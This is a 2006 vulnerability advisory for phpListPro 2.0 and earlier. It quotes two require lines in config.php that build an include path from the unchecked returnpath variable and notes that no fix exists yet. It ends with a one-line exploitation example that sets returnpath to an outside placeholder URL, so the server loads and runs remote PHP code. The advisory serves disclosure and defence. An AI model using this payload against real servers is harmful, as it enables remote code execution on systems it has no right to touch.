phpListPro <= 2.0 - Remote File Include Vulnerability

2006-04-12T00:00:00
ID SECURITYVULNS:DOC:12178
Type securityvulns
Reporter Securityvulns
Modified 2006-04-12T00:00:00

Description

phpListPro <= 2.0 - Remote File Include Vulnerability

Software: phpListPro Version: <=2.00 Type: Remote File Include Vulnerability Date: April, 11th 2006 Vendor: SmartISoft Page: http://smartisoft.com Risc: High

Credits:

'Aesthetico' http://www.majorsecurity.de

Description:

PHP/mySQL rating TopList professional.

Vulnerability:

The config.php is vulnerable at following lines:

142: require ($returnpath."lang_".$default_language.".php"); 143: require ($returnpath."library.php");

Solution:

There isn't a solution yet.

Exploitation:

Post data: returnpath=http://www.yourspace.com/yourscript.php?